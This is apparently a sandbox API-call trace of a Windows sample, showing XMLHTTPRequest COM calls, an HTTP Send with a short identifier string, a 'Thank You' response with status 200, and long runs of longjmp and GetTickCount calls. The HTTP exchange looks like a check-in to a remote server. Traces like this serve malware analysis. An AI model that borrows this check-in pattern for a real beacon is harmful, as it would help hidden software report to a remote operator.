	[0109.824] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0109.824] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0109.824] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0109.824] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0109.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0109.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0109.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0109.825] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0109.825] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0109.825] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0109.826] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0109.826] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0109.826] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0109.826] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0109.826] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0109.826] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0109.826] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0109.826] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0109.826] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0109.826] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0109.826] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0109.826] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0109.826] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0109.826] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x112f38 | out: ppvObject=0x112f38*=0x0) returned 0x80004002
	[0109.827] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0109.827] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0109.827] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x5a6a268 | out: ppvObject=0x5a6a268*=0x0) returned 0x80004002
	[0109.827] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0120.047] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0120.047] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0120.047] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0120.048] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0120.048] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0120.048] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 7881201", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0120.048] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0120.048] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0120.048] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0120.048] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0120.048] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0120.049] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0120.049] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0120.049] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0120.049] malloc (_Size=0xb0) returned 0x42e060
	[0120.049] ??2@YAPEAX_K@Z () returned 0x42c950
	[0120.050] ??3@YAXPEAX@Z () returned 0x8100340001
	[0120.050] free (_Block=0x42e060) 
	[0120.050] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0120.050] ??3@YAXPEAX@Z () returned 0xae00080001
	[0120.051] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0120.051] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0120.051] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0120.052] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0120.052] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0120.052] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0120.052] GetTickCount () returned 0x115514c
	[0120.052] GetTickCount () returned 0x115514c
	[0120.052] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0120.052] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0120.052] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0120.054] longjmp () 
	[0120.055] longjmp () 
	[0120.055] longjmp () 
	[0120.055] GetCurrentThreadId () returned 0x9a8
	[0120.055] GetCurrentThreadId () returned 0x9a8
	[0120.055] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0120.055] malloc (_Size=0x80) returned 0x3c88b0
	[0120.055] longjmp () 
	[0120.055] longjmp () 
	[0120.055] longjmp () 
	[0120.056] longjmp () 
	[0120.056] longjmp () 
	[0120.056] longjmp () 
	[0120.056] longjmp () 
	[0120.056] longjmp () 
	[0120.056] longjmp () 
	[0120.057] longjmp () 
	[0120.057] longjmp () 
	[0120.057] longjmp () 
	[0120.057] longjmp () 
	[0120.057] longjmp () 
	[0120.058] longjmp () 
	[0120.058] longjmp () 
	[0120.058] longjmp () 
	[0120.058] longjmp () 
	[0120.058] longjmp () 
	[0120.059] longjmp () 
	[0120.059] longjmp () 
	[0120.059] GetTickCount () returned 0x115515b
	[0120.059] longjmp () 
	[0120.059] longjmp () 
	[0120.059] longjmp () 
	[0120.059] longjmp () 
	[0120.060] longjmp () 
	[0120.060] longjmp () 
	[0120.060] longjmp () 
	[0120.060] longjmp () 
	[0120.060] longjmp () 
	[0120.060] longjmp () 
	[0120.061] longjmp () 
	[0120.061] longjmp () 
	[0120.061] longjmp () 
	[0120.061] longjmp () 
	[0120.061] longjmp () 
	[0120.061] longjmp () 
	[0120.061] longjmp () 
	[0120.062] longjmp () 
	[0120.062] longjmp () 
	[0120.062] longjmp () 
	[0120.062] longjmp () 
	[0120.062] longjmp () 
	[0120.063] longjmp () 
	[0120.063] longjmp () 
	[0120.063] longjmp () 
	[0120.063] longjmp () 
	[0120.063] longjmp () 
	[0120.063] longjmp () 
	[0120.063] longjmp () 
	[0120.064] longjmp () 
	[0120.064] longjmp () 
	[0120.064] longjmp () 
	[0120.064] GetTickCount () returned 0x115515b
	[0120.064] longjmp () 
	[0120.064] longjmp () 
	[0120.064] longjmp () 
	[0120.064] longjmp () 
	[0120.065] longjmp () 
	[0120.065] longjmp () 
	[0120.065] longjmp () 
	[0120.065] longjmp () 
	[0120.065] longjmp () 
	[0120.066] longjmp () 
	[0120.066] longjmp () 
	[0120.066] longjmp () 
	[0120.066] longjmp () 
	[0120.067] longjmp () 
	[0120.067] longjmp () 
	[0120.067] longjmp () 
	[0120.067] longjmp () 
	[0120.068] longjmp () 
	[0120.068] longjmp () 
	[0120.068] longjmp () 
	[0120.068] longjmp () 
	[0120.068] longjmp () 
	[0120.068] longjmp () 
	[0120.068] longjmp () 
	[0120.069] longjmp () 
	[0120.069] longjmp () 
	[0120.069] longjmp () 
	[0120.069] longjmp () 
	[0120.069] longjmp () 
	[0120.069] longjmp () 
	[0120.070] longjmp () 
	[0120.070] longjmp () 
	[0120.070] GetTickCount () returned 0x115515b
	[0120.070] longjmp () 
	[0120.070] longjmp () 
	[0120.070] longjmp () 
	[0120.070] longjmp () 
	[0120.071] longjmp () 
	[0120.071] longjmp () 
	[0120.071] longjmp () 
	[0120.071] longjmp () 
	[0120.071] longjmp () 
	[0120.071] longjmp () 
	[0120.072] longjmp () 
	[0120.072] longjmp () 
	[0120.072] longjmp () 
	[0120.072] longjmp () 
	[0120.072] longjmp () 
	[0120.072] longjmp () 
	[0120.073] longjmp () 
	[0120.073] longjmp () 
	[0120.073] longjmp () 
	[0120.073] longjmp () 
	[0120.073] longjmp () 
	[0120.073] longjmp () 
	[0120.074] longjmp () 
	[0120.074] longjmp () 
	[0120.074] longjmp () 
	[0120.074] longjmp () 
	[0120.074] longjmp () 
	[0120.075] longjmp () 
	[0120.075] longjmp () 
	[0120.075] longjmp () 
	[0120.075] longjmp () 
	[0120.075] longjmp () 
	[0120.075] GetTickCount () returned 0x115516b
	[0120.075] longjmp () 
	[0120.076] longjmp () 
	[0120.076] longjmp () 
	[0120.076] longjmp () 
	[0120.076] longjmp () 
	[0120.076] longjmp () 
	[0120.076] longjmp () 
	[0120.077] longjmp () 
	[0120.077] longjmp () 
	[0120.077] longjmp () 
	[0120.077] longjmp () 
	[0120.077] longjmp () 
	[0120.077] longjmp () 
	[0120.078] longjmp () 
	[0120.078] longjmp () 
	[0120.078] longjmp () 
	[0120.078] longjmp () 
	[0120.078] longjmp () 
	[0120.078] longjmp () 
	[0120.078] longjmp () 
	[0120.079] longjmp () 
	[0120.079] longjmp () 
	[0120.079] longjmp () 
	[0120.079] longjmp () 
	[0120.079] longjmp () 
	[0120.079] longjmp () 
	[0120.079] longjmp () 
	[0120.079] longjmp () 
	[0120.080] longjmp () 
	[0120.080] longjmp () 
	[0120.080] longjmp () 
	[0120.080] longjmp () 
	[0120.080] GetTickCount () returned 0x115516b
	[0120.080] longjmp () 
	[0120.081] longjmp () 
	[0120.081] longjmp () 
	[0120.081] longjmp () 
	[0120.081] longjmp () 
	[0120.081] longjmp () 
	[0120.081] longjmp () 
	[0120.081] longjmp () 
	[0120.082] longjmp () 
	[0120.082] longjmp () 
	[0120.082] longjmp () 
	[0120.082] longjmp () 
	[0120.082] longjmp () 
	[0120.082] longjmp () 
	[0120.082] longjmp () 
	[0120.083] longjmp () 
	[0120.083] longjmp () 
	[0120.083] longjmp () 
	[0120.083] longjmp () 
	[0120.083] longjmp () 
	[0120.083] longjmp () 
	[0120.083] longjmp () 
	[0120.084] longjmp () 
	[0120.084] longjmp () 
	[0120.084] longjmp () 
	[0120.084] longjmp () 
	[0120.084] longjmp () 
	[0120.084] longjmp () 
	[0120.085] longjmp () 
	[0120.085] longjmp () 
	[0120.085] longjmp () 
	[0120.085] longjmp () 
	[0120.085] GetTickCount () returned 0x115516b
	[0120.085] longjmp () 
	[0120.085] longjmp () 
	[0120.086] longjmp () 
	[0120.086] longjmp () 
	[0120.086] longjmp () 
	[0120.086] longjmp () 
	[0120.086] longjmp () 
	[0120.086] longjmp () 
	[0120.086] longjmp () 
	[0120.087] longjmp () 
	[0120.087] longjmp () 
	[0120.087] longjmp () 
	[0120.087] longjmp () 
	[0120.087] longjmp () 
	[0120.087] longjmp () 
	[0120.088] longjmp () 
	[0120.088] longjmp () 
	[0120.088] longjmp () 
	[0120.088] longjmp () 
	[0120.088] longjmp () 
	[0120.088] longjmp () 
	[0120.088] longjmp () 
	[0120.089] longjmp () 
	[0120.089] longjmp () 
	[0120.089] longjmp () 
	[0120.089] longjmp () 
	[0120.089] longjmp () 
	[0120.089] longjmp () 
	[0120.089] longjmp () 
	[0120.090] longjmp () 
	[0120.090] longjmp () 
	[0120.090] longjmp () 
	[0120.090] GetTickCount () returned 0x115517b
	[0120.090] longjmp () 
	[0120.090] longjmp () 
	[0120.090] longjmp () 
	[0120.091] longjmp () 
	[0120.091] longjmp () 
	[0120.091] longjmp () 
	[0120.091] longjmp () 
	[0120.091] longjmp () 
	[0120.091] longjmp () 
	[0120.092] longjmp () 
	[0120.092] longjmp () 
	[0120.092] longjmp () 
	[0120.092] longjmp () 
	[0120.092] longjmp () 
	[0120.092] longjmp () 
	[0120.092] longjmp () 
	[0120.093] longjmp () 
	[0120.093] longjmp () 
	[0120.093] longjmp () 
	[0120.093] longjmp () 
	[0120.093] longjmp () 
	[0120.093] longjmp () 
	[0120.093] longjmp () 
	[0120.093] longjmp () 
	[0120.094] longjmp () 
	[0120.094] longjmp () 
	[0120.094] longjmp () 
	[0120.094] longjmp () 
	[0120.094] longjmp () 
	[0120.094] longjmp () 
	[0120.095] longjmp () 
	[0120.095] longjmp () 
	[0120.095] GetTickCount () returned 0x115517b
	[0120.095] longjmp () 
	[0120.095] longjmp () 
	[0120.095] longjmp () 
	[0120.095] longjmp () 
	[0120.095] longjmp () 
	[0120.096] longjmp () 
	[0120.096] longjmp () 
	[0120.096] longjmp () 
	[0120.096] longjmp () 
	[0120.096] longjmp () 
	[0120.096] longjmp () 
	[0120.096] longjmp () 
	[0120.097] longjmp () 
	[0120.097] longjmp () 
	[0120.097] longjmp () 
	[0120.097] longjmp () 
	[0120.097] longjmp () 
	[0120.097] longjmp () 
	[0120.098] longjmp () 
	[0120.098] longjmp () 
	[0120.098] longjmp () 
	[0120.098] longjmp () 
	[0120.098] longjmp () 
	[0120.098] longjmp () 
	[0120.098] longjmp () 
	[0120.099] longjmp () 
	[0120.099] longjmp () 
	[0120.099] longjmp () 
	[0120.099] longjmp () 
	[0120.099] longjmp () 
	[0120.099] longjmp () 
	[0120.099] longjmp () 
	[0120.100] GetTickCount () returned 0x115517b
	[0120.100] longjmp () 
	[0120.100] longjmp () 
	[0120.100] longjmp () 
	[0120.100] longjmp () 
	[0120.100] longjmp () 
	[0120.100] longjmp () 
	[0120.100] longjmp () 
	[0120.101] longjmp () 
	[0120.101] longjmp () 
	[0120.101] longjmp () 
	[0120.101] longjmp () 
	[0120.101] longjmp () 
	[0120.101] longjmp () 
	[0120.102] longjmp () 
	[0120.102] longjmp () 
